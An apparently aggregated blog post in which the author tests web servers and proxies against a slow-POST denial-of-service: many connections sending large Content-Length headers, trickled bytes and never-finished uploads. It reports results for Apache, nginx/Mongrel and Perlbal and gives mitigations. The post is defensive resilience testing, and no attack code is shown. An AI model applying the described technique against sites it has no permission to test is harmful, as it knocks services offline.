This post originated from an RSS feed registered with Python Buzz
by Phillip Pearson.
Original Post: How other people can kill your web server: no fun and little profit :(
Feed Title: Second p0st
Feed URL: http://www.myelin.co.nz/post/rss.xml
Feed Description: Tech notes and web hackery from the guy that brought you bzero, Python Community Server, the Blogging Ecosystem and the Internet Topic Exchange
This is probably old news to anyone who's run anything spammable on the web for long enough, but there are bots out there that don't do HTTP particularly well. I had this problem with the Topic Exchange years ago and it just recently hit a couple of BBM's sites. It's now fixed (for some definition of "fixed") in both cases with a Python proxy I wrote to buffer uploads and responses.
Curious as to whether other "standard solutions" out there handle this situation, and also so I could test out my proxy, I wrote a script that makes many HTTP connections to a site, writes POST headers with a large Content-Length, then feeds a byte into each of them every now and then so they don't time out, but never actually finishes the POST.
It took down my development box within seconds, driving it so badly out of memory that the Linux OOM killer kicked in and tore the thing to shreds. Reducing MaxClients in the Apache config improved the situation to the point where the machine would stay up, but the script would still make the site inaccessible (and fill up the accept queue so that nobody would be able to get in even if a request ever did get fully posted). Apache stops accepting requests when it runs out of children, so the script just started getting rejected connects after a while. Killing the script (and closing all the sockets) resulted in the site being instantly accessible again.
Trying it out with my proxy in front, I ran it for a few minutes but killed it after it established > 10k HTTP connections without affecting the site. My proxy's not particularly clever so you could cause the machine to run out of swap by feeding it gigabytes of data, but it seems fine with lots of connections, at least.
Testing it on a Rails site running on a Mongrel cluster behind nginx gave similar results: no memory exhaustion (as no child processes are spawned with Mongrel/nginx) but an inaccessible site. Interestingly, the site didn't come back for a few minutes after killing the script; nginx or Mongrel took a while to process all the disconnects, or something.
One bit of software I thought would be able to take a beating without batting an eyelash is Perlbal. And it did... to a point. It seems to use quite a lot of memory per connection, and after 500 connections (at which point it was using something like 3G of virtual memory) it printed "Out of memory!" and died. This is kind of scary, as Perlbal doesn't auto-respawn by itself (at least with the provided debian/perlbal.init script). So if you're running Perlbal you might want to run it under something like supervise or monit, or just in a simple shell script like this:
#!/bin/sh
while true; do
/usr/local/bin/perlbal --daemon
sleep 1
done
(I'll ping the Perlbal dev list in a minute, as I'm sure it would be possible to get it to stop accept()ing in low memory situations, or perhaps have it limit the number of simultaneous connections per IP.)
If anyone has a service running behind a different proxy/balancer that they wouldn't mind me running the script against, please drop me a line. Or for that matter if anyone has a web service that they're concerned is easily taken down, let me know... I'd be interested to see how resilient other proxies and web servers are.